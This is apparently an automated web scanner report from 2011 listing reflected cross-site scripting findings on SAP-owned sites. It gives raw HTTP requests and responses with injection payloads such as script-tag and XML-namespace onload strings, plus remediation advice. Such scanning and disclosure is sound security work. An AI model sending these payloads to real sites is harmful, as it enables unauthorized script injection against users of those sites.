<script langua ...[SNIP]... <script language="Javascript"> var DOCUMENTGROUP='gwtservices597d9';c31b6b8d8f4'; var DOCUMENTNAME='Bridge'; if(!ACTION) var ACTION; ACTION='03';
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7b4a5'%3bd754e510cf4 was submitted in the REST URL parameter 1. This input was echoed as 7b4a5';d754e510cf4 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news-reader7b4a5'%3bd754e510cf4/ HTTP/1.1
Host: www.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 File Not Found
Cache-Control: private
Content-Length: 33863
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; domain=.sap.com; expires=Mon, 14-Oct-2013 15:02:38 GMT; path=/
Set-Cookie: SAP.TTC=1318688442; domain=.sap.com; expires=Fri, 13-Jan-2012 16:02:38 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 15:02:38 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
<script langua ...[SNIP]... <script language="Javascript"> var DOCUMENTGROUP='news-reader7b4a5';d754e510cf4'; var DOCUMENTNAME='Error';
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b42bf'%3bab2f3f3c6e6 was submitted in the REST URL parameter 1. This input was echoed as b42bf';ab2f3f3c6e6 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /printb42bf'%3bab2f3f3c6e6/sme/search/SAP_nn6.js HTTP/1.1
Host: www.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 File Not Found
Cache-Control: private
Content-Length: 33993
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; domain=.sap.com; expires=Mon, 14-Oct-2013 15:04:26 GMT; path=/
Set-Cookie: SAP.TTC=1318688442; domain=.sap.com; expires=Fri, 13-Jan-2012 16:04:26 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 15:04:28 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
<script langua ...[SNIP]... <script language="Javascript"> var DOCUMENTGROUP='printb42bf';ab2f3f3c6e6'; var DOCUMENTNAME='Error';
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4a1c1'%3b2fef0b79263 was submitted in the REST URL parameter 1. This input was echoed as 4a1c1';2fef0b79263 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /print4a1c1'%3b2fef0b79263/zzzzzz=yyyyy HTTP/1.1
Host: www.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 File Not Found
Cache-Control: private
Content-Length: 33921
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; domain=.sap.com; expires=Mon, 14-Oct-2013 15:03:42 GMT; path=/
Set-Cookie: SAP.TTC=1318688442; domain=.sap.com; expires=Fri, 13-Jan-2012 16:03:42 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 15:03:43 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
<script langua ...[SNIP]... <script language="Javascript"> var DOCUMENTGROUP='print4a1c1';2fef0b79263'; var DOCUMENTNAME='Error';
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3af54'%3b4a60b9cecd6 was submitted in the REST URL parameter 1. This input was echoed as 3af54';4a60b9cecd6 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a2480'%3bb72d33e177b was submitted in the REST URL parameter 1. This input was echoed as a2480';b72d33e177b in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /texta2480'%3bb72d33e177b/sme/search/SAP_nn6.js HTTP/1.1
Host: www.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 File Not Found
Cache-Control: private
Content-Length: 33986
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; domain=.sap.com; expires=Mon, 14-Oct-2013 15:03:19 GMT; path=/
Set-Cookie: SAP.TTC=1318688442; domain=.sap.com; expires=Fri, 13-Jan-2012 16:03:19 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 15:03:19 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
<script langua ...[SNIP]... <script language="Javascript"> var DOCUMENTGROUP='texta2480';b72d33e177b'; var DOCUMENTNAME='Error';
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 38958'%3bda57bbc2a62 was submitted in the REST URL parameter 1. This input was echoed as 38958';da57bbc2a62 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /text38958'%3bda57bbc2a62/zzzzzz=yyyyy HTTP/1.1
Host: www.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 File Not Found
Cache-Control: private
Content-Length: 33914
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; domain=.sap.com; expires=Mon, 14-Oct-2013 15:03:26 GMT; path=/
Set-Cookie: SAP.TTC=1318688442; domain=.sap.com; expires=Fri, 13-Jan-2012 16:03:26 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 15:03:44 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
<script langua ...[SNIP]... <script language="Javascript"> var DOCUMENTGROUP='text38958';da57bbc2a62'; var DOCUMENTNAME='Error';
var _s_cf17='Global';
</script> ...[SNIP]...
3.86. https://www.sap.com/contactsap/contact_warning.epx [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
https://www.sap.com
Path:
/contactsap/contact_warning.epx
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b53d3"><script>alert(1)</script>f9f797a16d1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /contactsap/contact_warning.epx?b53d3"><script>alert(1)</script>f9f797a16d1=1 HTTP/1.1
Host: www.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 3577
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; domain=.sap.com; expires=Mon, 14-Oct-2013 15:04:39 GMT; path=/
Set-Cookie: SAP.TTC=1318688442; domain=.sap.com; expires=Fri, 13-Jan-2012 16:04:39 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 15:04:43 GMT
Connection: close
3.87. https://www.sap.com/profile/warning.epx [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
https://www.sap.com
Path:
/profile/warning.epx
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 54634"><script>alert(1)</script>c3e800f960b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /profile/warning.epx?54634"><script>alert(1)</script>c3e800f960b=1 HTTP/1.1
Host: www.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 5163
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; domain=.sap.com; expires=Mon, 14-Oct-2013 15:05:07 GMT; path=/
Set-Cookie: SAP.TTC=1318688442; domain=.sap.com; expires=Fri, 13-Jan-2012 16:05:07 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 15:05:13 GMT
Connection: close
The value of the xajax request parameter is copied into the XML document as plain text between tags. The payload c6c53<a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>9e68deb371861330c was submitted in the xajax parameter. This input was echoed as c6c53<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>9e68deb371861330c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The response into which the attack is echoed contains XML data, which is not by default processed by the browser as HTML. However, by injecting XML elements which create a new namespace it is possible to trick some browsers (including Firefox) into processing part of the response as HTML. Note that this proof-of-concept attack is designed to execute when processed by the browser as a standalone response, not when the XML is consumed by a script within another page.
The original request used the POST method; however, it was possible to convert the request to use the GET method, which makes the attack easier to demonstrate and deliver.
Request
GET /?xajax=registerUserc6c53<a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>9e68deb371861330c&xajaxr=1318692636849 HTTP/1.1
Host: www.sapbusinessoptimizer.com
Proxy-Connection: keep-alive
Origin: http://www.sapbusinessoptimizer.com
Method: POST http://www.sapbusinessoptimizer.com/ HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.sapbusinessoptimizer.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _pk_ref.6.52a4=1318692589.http%3A%2F%2Fburp%2Fshow%2F28; PHPSESSID=80919d45b65a6e627a6f2d33b9be0d7a; _pk_id.6.52a4=7b8ad9472e0c4cae.1318692589.1.1318692630.1318692589; _pk_ses.6.52a4=*
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 962bb"><script>alert(1)</script>4cbb556654f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 404 Not Found
Date: Sat, 15 Oct 2011 15:29:36 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 825
Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html> <head> <title>Error: 404 - Page Not Found - error 404</title> <style type="text/css"> body{font-family:Verdana,Tahoma,Helvetica,Arial,sans-ser ...[SNIP]... <a href="http://www.sapbusinessoptimizer.com/css962bb"><script>alert(1)</script>4cbb556654f/fancy-popup-styles.css"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 93738<script>alert(1)</script>2090b0d7ed was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 404 Not Found
Date: Sat, 15 Oct 2011 15:29:36 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 819
Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html> <head> <title>Error: 404 - Page Not Found - error 404</title> <style type="text/css"> body{font-family:Verdana,Tahoma,Helvetica,Arial,sans-ser ...[SNIP]... </script>2090b0d7ed/fancy-popup-styles.css">http://www.sapbusinessoptimizer.com/css93738<script>alert(1)</script>2090b0d7ed/fancy-popup-styles.css</a> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 74698"><script>alert(1)</script>0d84999f009 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 404 Not Found
Date: Sat, 15 Oct 2011 15:29:37 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 825
Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html> <head> <title>Error: 404 - Page Not Found - error 404</title> <style type="text/css"> body{font-family:Verdana,Tahoma,Helvetica,Arial,sans-ser ...[SNIP]... <a href="http://www.sapbusinessoptimizer.com/css/fancy-popup-styles.css74698"><script>alert(1)</script>0d84999f009"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 2bad6<script>alert(1)</script>603e9c4cf8c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 404 Not Found
Date: Sat, 15 Oct 2011 15:29:38 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 821
Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html> <head> <title>Error: 404 - Page Not Found - error 404</title> <style type="text/css"> body{font-family:Verdana,Tahoma,Helvetica,Arial,sans-ser ...[SNIP]... </script>603e9c4cf8c">http://www.sapbusinessoptimizer.com/css/fancy-popup-styles.css2bad6<script>alert(1)</script>603e9c4cf8c</a> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ab7fe"><script>alert(1)</script>a5d7dab7a6f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 404 Not Found
Date: Sat, 15 Oct 2011 15:29:45 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 795
Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html> <head> <title>Error: 404 - Page Not Found - error 404</title> <style type="text/css"> body{font-family:Verdana,Tahoma,Helvetica,Arial,sans-ser ...[SNIP]... <a href="http://www.sapbusinessoptimizer.com/favicon.icoab7fe"><script>alert(1)</script>a5d7dab7a6f"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 18538<script>alert(1)</script>0816d580e57 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 404 Not Found
Date: Sat, 15 Oct 2011 15:29:45 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 791
Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html> <head> <title>Error: 404 - Page Not Found - error 404</title> <style type="text/css"> body{font-family:Verdana,Tahoma,Helvetica,Arial,sans-ser ...[SNIP]... </script>0816d580e57">http://www.sapbusinessoptimizer.com/favicon.ico18538<script>alert(1)</script>0816d580e57</a> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload f27d4<script>alert(1)</script>9e1fbf305d2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 404 Not Found
Date: Sat, 15 Oct 2011 15:31:04 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 901
Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html> <head> <title>Error: 404 - Page Not Found - error 404</title> <style type="text/css"> body{font-family:Verdana,Tahoma,Helvetica,Arial,sans-ser ...[SNIP]... </script>9e1fbf305d2/script%3Ea5d7dab7a6f">http://www.sapbusinessoptimizer.com/favicon.icoab7fe%22%3E%3Cscript%3Ealert(1)%3Cf27d4<script>alert(1)</script>9e1fbf305d2/script%3Ea5d7dab7a6f</a> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a7c89"><script>alert(1)</script>713d58a2cd2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 404 Not Found
Date: Sat, 15 Oct 2011 15:31:04 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 905
Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html> <head> <title>Error: 404 - Page Not Found - error 404</title> <style type="text/css"> body{font-family:Verdana,Tahoma,Helvetica,Arial,sans-ser ...[SNIP]... <a href="http://www.sapbusinessoptimizer.com/favicon.icoab7fe%22%3E%3Cscript%3Ealert(1)%3Ca7c89"><script>alert(1)</script>713d58a2cd2/script%3Ea5d7dab7a6f"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 69a3a"><script>alert(1)</script>699ec413f8c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 404 Not Found
Date: Sat, 15 Oct 2011 15:31:05 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 905
Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html> <head> <title>Error: 404 - Page Not Found - error 404</title> <style type="text/css"> body{font-family:Verdana,Tahoma,Helvetica,Arial,sans-ser ...[SNIP]... <a href="http://www.sapbusinessoptimizer.com/favicon.icoab7fe%22%3E%3Cscript%3Ealert(1)%3C/script%3Ea5d7dab7a6f69a3a"><script>alert(1)</script>699ec413f8c"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 86c22<script>alert(1)</script>99a0b1eb0e3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 404 Not Found
Date: Sat, 15 Oct 2011 15:31:06 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 901
Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html> <head> <title>Error: 404 - Page Not Found - error 404</title> <style type="text/css"> body{font-family:Verdana,Tahoma,Helvetica,Arial,sans-ser ...[SNIP]... </script>99a0b1eb0e3">http://www.sapbusinessoptimizer.com/favicon.icoab7fe%22%3E%3Cscript%3Ealert(1)%3C/script%3Ea5d7dab7a6f86c22<script>alert(1)</script>99a0b1eb0e3</a> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 8acc2<script>alert(1)</script>01c7804de87 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 404 Not Found Date: Sat, 15 Oct 2011 15:29:57 GMT Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 839 Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html> <head> <title>Error: 404 - Page Not Found - error 404</title> <style type="text/css"> body{font-family:Verdana,Tahoma,Helvetica,Arial,sans-ser ...[SNIP]... </script>01c7804de87/SAPSans2007ExtraBoldCond.woff">http://www.sapbusinessoptimizer.com/fonts8acc2<script>alert(1)</script>01c7804de87/SAPSans2007ExtraBoldCond.woff</a> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a14ba"><script>alert(1)</script>01e6d48cacd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 404 Not Found Date: Sat, 15 Oct 2011 15:29:56 GMT Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 843 Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html> <head> <title>Error: 404 - Page Not Found - error 404</title> <style type="text/css"> body{font-family:Verdana,Tahoma,Helvetica,Arial,sans-ser ...[SNIP]... <a href="http://www.sapbusinessoptimizer.com/fontsa14ba"><script>alert(1)</script>01e6d48cacd/SAPSans2007ExtraBoldCond.woff"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 26a30<script>alert(1)</script>99080e416fe was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 404 Not Found Date: Sat, 15 Oct 2011 15:29:58 GMT Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 839 Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html> <head> <title>Error: 404 - Page Not Found - error 404</title> <style type="text/css"> body{font-family:Verdana,Tahoma,Helvetica,Arial,sans-ser ...[SNIP]... </script>99080e416fe">http://www.sapbusinessoptimizer.com/fonts/SAPSans2007ExtraBoldCond.woff26a30<script>alert(1)</script>99080e416fe</a> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c35b9"><script>alert(1)</script>cb0a464daf0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 404 Not Found Date: Sat, 15 Oct 2011 15:29:57 GMT Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 843 Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html> <head> <title>Error: 404 - Page Not Found - error 404</title> <style type="text/css"> body{font-family:Verdana,Tahoma,Helvetica,Arial,sans-ser ...[SNIP]... <a href="http://www.sapbusinessoptimizer.com/fonts/SAPSans2007ExtraBoldCond.woffc35b9"><script>alert(1)</script>cb0a464daf0"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 86654"><script>alert(1)</script>9a99eb8cf35 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 404 Not Found Date: Sat, 15 Oct 2011 15:29:49 GMT Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 807 Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html> <head> <title>Error: 404 - Page Not Found - error 404</title> <style type="text/css"> body{font-family:Verdana,Tahoma,Helvetica,Arial,sans-ser ...[SNIP]... <a href="http://www.sapbusinessoptimizer.com/js86654"><script>alert(1)</script>9a99eb8cf35/swc/common.tao"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ff9f9<script>alert(1)</script>98e1be46692 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 404 Not Found Date: Sat, 15 Oct 2011 15:29:50 GMT Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 803 Content-Type: text/html
